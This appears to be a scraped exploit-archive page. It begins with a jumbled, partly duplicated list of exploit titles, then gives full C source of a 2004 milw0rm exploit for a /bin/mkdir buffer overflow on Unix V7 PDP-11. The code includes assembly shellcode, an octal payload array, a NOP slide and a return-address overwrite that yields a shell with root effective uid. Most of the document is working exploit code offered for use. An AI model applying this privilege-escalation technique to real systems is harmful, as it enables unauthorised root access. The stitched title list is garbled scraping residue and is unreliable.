
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
80 lines
1.9 KiB
C
Executable file
80 lines
1.9 KiB
C
Executable file
/*
|
|
* Exploit for /bin/mkdir Unix V7 PDP-11.
|
|
* mkdir has a buffer overflow when checking if the directory
|
|
* in /arg/with/slashes/fname exists.
|
|
*
|
|
* This will run /bin/sh with euid 0, but not uid 0. Since
|
|
* the shell doesn't do anything special about this, we don't
|
|
* really care. If you care, run setuid(0); execl("/bin/sh", 0);
|
|
*/
|
|
|
|
/*
|
|
.globl _main
|
|
_main:
|
|
mov pc,r1
|
|
sub $-[sh-_main-2], r1 / pointer to sh
|
|
mov r1, r2
|
|
sub $-8, r2
|
|
clrb -1(r2) / null terminate
|
|
mov r1, r2
|
|
clr -(r1) / char *env[] = {0}
|
|
mov r1, r3
|
|
mov r2, -(r1) / char *argv[] = {sh, 0}
|
|
mov r1, r4
|
|
mov r3, -(r1) / reverse of sh,argv,env
|
|
mov r4, -(r1)
|
|
mov r2, -(r1)
|
|
sys 59.; 11111; 11111; 11111 / call execve
|
|
argv: 11111; 11111
|
|
sh: </bin/sh>
|
|
*/
|
|
|
|
char egg[] = { 0301, 021, 0301, 0345, 0326, 0377, 0102, 020,
|
|
0302, 0345, 0370, 0377, 062, 0212, 0377, 0377,
|
|
0102, 020, 041, 012, 0103, 020, 0241, 020,
|
|
0104, 020, 0341, 020, 041, 021, 0241, 020,
|
|
073, 0211, 0111, 022, 0111, 022, 0111, 022,
|
|
0111, 022, 0111, 022, 057, 0142, 0151, 0156,
|
|
057, 0163, 0150, 0 };
|
|
|
|
#define NOPSLIDE 50
|
|
#define CNT 136
|
|
#define PC 0xfea0
|
|
|
|
main(argc, argv)
|
|
int argc;
|
|
char **argv;
|
|
{
|
|
char buf[400];
|
|
int i;
|
|
char *argv2[4];
|
|
|
|
/* nop slide + egg */
|
|
for(i = 0; i < NOPSLIDE; ) {
|
|
buf[i++] = 0301;
|
|
buf[i++] = 021;
|
|
}
|
|
strcpy(buf + i, egg);
|
|
|
|
/* pad out to CNT */
|
|
for(i = strlen(buf); i < CNT; i++)
|
|
buf[i] = 'a';
|
|
|
|
/* overwrite retaddr */
|
|
buf[i++] = PC & 0xff;
|
|
buf[i++] = PC >> 8;
|
|
|
|
/* extra stuff */
|
|
buf[i++] = '/';
|
|
buf[i++] = 'a';
|
|
buf[i++] = 0;
|
|
|
|
argv2[0] = "/bin/mkdir";
|
|
argv2[1] = buf;
|
|
argv2[2] = 0;
|
|
execv(argv2[0], argv2);
|
|
return 0;
|
|
}
|
|
|
|
|
|
// milw0rm.com [2004-06-25]
|